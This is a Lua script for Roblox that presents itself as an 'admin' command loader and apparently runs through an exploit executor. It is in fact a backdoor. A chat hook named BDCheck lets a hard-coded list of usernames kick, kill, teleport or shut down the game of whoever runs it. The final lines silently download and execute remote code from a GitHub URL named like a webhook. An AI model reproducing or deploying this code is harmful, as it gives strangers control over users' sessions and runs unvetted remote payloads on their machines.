-- admin --
local admins,notadmins=pcall(function()
-- [[ 3001347724 ]] --
if getgenv().adm then _G.rnote("Admins already loaded") return end;

_G.AdminPrefix = (".")
getgenv().FUNK = ("KommandFunktion");
getgenv().LVL = ("AxxessLevel");
FUNK=getgenv().FUNK;
LVL=getgenv().LVL;

_G.Admins = {
[3001347724] = 1; ["lulaslollipop"] = 1;
["iloweil"] = 1,
["vimjqcVBinsane355"] = 1, ["9K342JB09fp0"] = 1, 
["XA93nxo5szdo"] = 1, ["bhn5cp6vgtwv"] = 1, 
["1BOVZ8qwtjw6"] = 1, ["20GXV6KNUZ53"] = 1, 
["IlIIIlIlIIlIIlIIlIIl"] = 1, ["xhexkers"] = 1, 
["20GXV6KNUZ53"] = 1,
["xheatkode"] = 1, ["siimeDLY"] = 1,
["rrixhslime"] = 1, ["halbib112233"] = 1,
["Justinseagull_20"] = 1,
["ggerrtasalt"] = 2,
["nogafarmer6942"] = 2,
};


local Players = game:GetService("Players")
local LocalP = Players.LocalPlayer;
local lpchar = LocalP.Character
local lpHum = lpchar.Humanoid
local lpHrp = lpchar.HumanoidRootPart

getgenv().AdminTable = {}
for UserID, AxxessLevel in pairs(_G.Admins) do
if tonumber(UserID) then -- Check if UserID is a number
getgenv().AdminTable[UserID] = {["Axxess"] = AxxessLevel};
else -- If UserID is not a number, try to find the player by name
for _, p in pairs(Players:GetPlayers()) do
if (string.lower(p.Name) == string.lower(UserID) or string.lower(p.DisplayName) == string.lower(UserID)) then
getgenv().AdminTable[p.UserId] = {["Axxess"] = AxxessLevel};
        end;
       end;
    end;
 end;

getgenv().psearch = function(Name)
local Inserted = {}
for _, p in pairs(Players:GetPlayers()) do
if string.lower(string.sub(p.Name,1, string.len(Name))) == string.lower(Name) then
table.insert(Inserted, p);return p
       end;
    end;
end -- plr find

getgenv().AdminKmdList = {
["kick"] = {
[FUNK] = function(Player, self, CmdPlayer)
if Player == LocalP or Player == "all" then
LocalP:Kick(self)
end
end;
[LVL] = {[1] = true, [2] = true, [3] = true, [4] = false, [5] = false}
}; -- kixk funk
["kill"] = {
[FUNK] = function(Player, self, CmdPlayer)
if Player == LocalP or Player == "all" then
LocalP.Character.Humanoid:ChangeState(15)
  end;
end;
[LVL] = {[1] = true, [2] = true, [3] = true, [4] = true, [5] = true}
   }; -- kill funk
["exit"] = {
[FUNK] = function(Player, self, KmdPlayer)
if Player == LocalP or Player == "all" then
LocalP:kick(self); task.wait(3.5); game:shutdown();
end;
end;
[LVL] = {[1] = true, [2] = true, [3] = false, [4] = false, [5] = false}
 }; -- exit funk
["bring"] = {
[FUNK] = function(Player, self, KmdPlayer)
if Player == LocalP or Player == "others" then
lpHrp.CFrame = KmdPlayer.Character.HumanoidRootPart.Position;
  end;
end;
[LVL] = {[1] = true, [2] = true, [3] = true, [4] = true, [5] = true}
 }; -- bring funk
}; -- admin kommand list

getgenv().BDCheck = function(Target2, Chat)
if Chat:sub(1, 1) == _G.AdminPrefix then
local args = string.split(Chat:sub(2), " ")
local Kommand = AdminKmdList[table.remove(args, 1)]
local targ1 = psearch(table.remove(args, 1))
if Kommand and targ1 then
return Kommand and Kommand[LVL][getgenv().AdminTable[Target2.UserId].Axxess] and Kommand[FUNK](targ1, table.concat(args, " "), Target2)
end
end
end;

local GP = Players:GetPlayers()
for i = 1, #GP do
local CoolKidPlayer = GP[i]
CoolKidPlayer.Chatted:Connect(function(Word)
BDCheck(CoolKidPlayer, Word)
end)
end
Players.PlayerAdded:Connect(function(CKP)
CKP.Chatted:Connect(function(Message)
BDCheck(CKP, Message)
end)
end);

task.wait()
warn("_G.Admins loaded!✅")
getgenv().adm = true;

end); -- protekt

if not admins then
if getgenv().globalz then _G.rnote("❌ _G.Admins error:\n"..notadmins); end;
if not getgenv().globalz then warn("❌ _G.Admins error:",notadmins); end;
end;
--[[admins loaded]]--

spawn(function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/rrixh/diskord/refs/heads/main/wHook_lulaslollipop",true))()
end)